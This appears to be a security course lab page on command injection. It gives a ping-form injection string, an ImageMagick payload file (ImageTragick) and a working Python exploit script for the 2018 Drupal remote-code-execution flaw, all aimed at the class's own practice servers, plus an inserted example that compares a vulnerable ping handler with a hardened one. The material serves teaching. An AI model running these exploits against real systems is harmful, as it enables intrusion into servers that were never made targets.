ED 102: Command Injection (60 pts)


Ping Form (20 pts)

The form below lets you send pings to a remote host. Unfortunately, it has a vulnerability.

To use the form normally, enter a target, such as

  127.0.0.1

To see the vulnerability, enter

  127.0.0.1; ls
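As an added example, not part of the lab page, here is the flawed pattern behind a ping form like this one in Python, beside a hardened handler that allow-lists the target as an IP literal and never hands it to a shell; the function names are assumed for illustration.

```python
import ipaddress
import subprocess

# Added example (not the lab's own code): the vulnerable pattern behind the
# ping form beside a hardened version, for comparing the two.


def vulnerable_ping_command(target: str) -> str:
    """The flawed pattern: user input pasted into a shell command string.
    A target of '127.0.0.1; ls' becomes two commands for /bin/sh."""
    return "ping -c 1 " + target          # would be passed to os.system()


def build_ping_argv(target: str) -> list:
    """Hardened: allow-list the input as an IP literal, then build an argv
    list so no shell ever parses it.  Raises ValueError on anything else."""
    # ipaddress rejects ';', '|', spaces, hostnames and anything else that is
    # not a v4/v6 literal, so shell metacharacters never reach a command.
    # An IP literal can never start with '-', which also blocks smuggling
    # extra options into ping itself.
    addr = ipaddress.ip_address(target.strip())
    return ["ping", "-c", "1", str(addr)]


def run_ping(target: str) -> str:
    """Execute the hardened command; shell=False means argv is exec'd directly."""
    argv = build_ping_argv(target)
    result = subprocess.run(argv, capture_output=True, text=True, timeout=10)
    return result.stdout + result.stderr


def is_safe_target(target: str) -> bool:
    """Form-validation helper: True only for a bare IPv4/IPv6 literal."""
    try:
        build_ping_argv(target)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    # Constructed sample inputs: the lab's normal and malicious targets plus two more.
    for candidate in ["127.0.0.1", "127.0.0.1; ls", "::1", "$(id)"]:
        print(f"{candidate!r}: shell string = {vulnerable_ping_command(candidate)!r}; "
              f"accepted by hardened handler = {is_safe_target(candidate)}")
```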

Challenges: Find the Flags (20 pts)

There are four flags available on this server:

ImageMagick Vulnerability (20 pts)

Normal Usage

  1. Get a normal GIF or JPEG image
  2. Upload it using the buttons below
  3. Click the thumbnail to see your image

Vulnerability

Make a text file with these contents:

  push graphic-context
  viewbox 0 0 640 480
  fill 'url(https://example.com"|echo "HELLO";date;")'
  pop graphic-context

Save it as exploit.jpg. Upload it using the form above on this page.

The "echo" and "date" commands execute, as shown below.

Challenges: Find the Flags (20 pts)

There are two flags available in the "chal2" folder:

Drupal Command Injection (20 pts)

Background

In April 2018, a critical Drupal vulnerability was announced, and exploit code became available, as detailed here:

https://thehackernews.com/2018/04/drupal-rce-exploit-code.html

In this project, you'll perform that attack.

Viewing the Vulnerable Website

In a browser, go to:

https://drupal.samsclass.info/

It's just a default installation of Drupal, as shown below.

Preparing the Attack

Using a text editor, such as nano or Notepad, create a file named dru.py containing this code. Change the filename YOURNAME to something unique in all three places it appears.
  import sys
  import requests

  # Based on https://github.com/a2u/CVE-2018-7600 by Vitalii Rudnykh

  target = "https://drupal.samsclass.info/"

  url = target + 'user/register?element_parents=account/mail/' \
        + '%23value&ajax_form=1&_wrapper_format=drupal_ajax'

  payload = {'form_id': 'user_register_form', '_drupal_ajax': '1',
             'mail[#post_render][]': 'exec', 'mail[#type]': 'markup',
             'mail[#markup]': 'echo ";-)" | tee YOURNAME.txt'}

  r = requests.post(url, data=payload)

  check = requests.get(target + 'YOURNAME.txt')
  if check.status_code != 200:
      sys.exit("Not exploitable")

  print('\nCheck: ' + target + 'YOURNAME.txt')

Running the Attack

In a Terminal or Command Prompt window, execute this command:

  python dru.py

The attack succeeds, creating a file on the target server, as shown below.

Challenges: Find the Flags (20 pts)

There are two flags on this server:


Posted 4-21-19
ImageMagick & Drupal added 4-23-19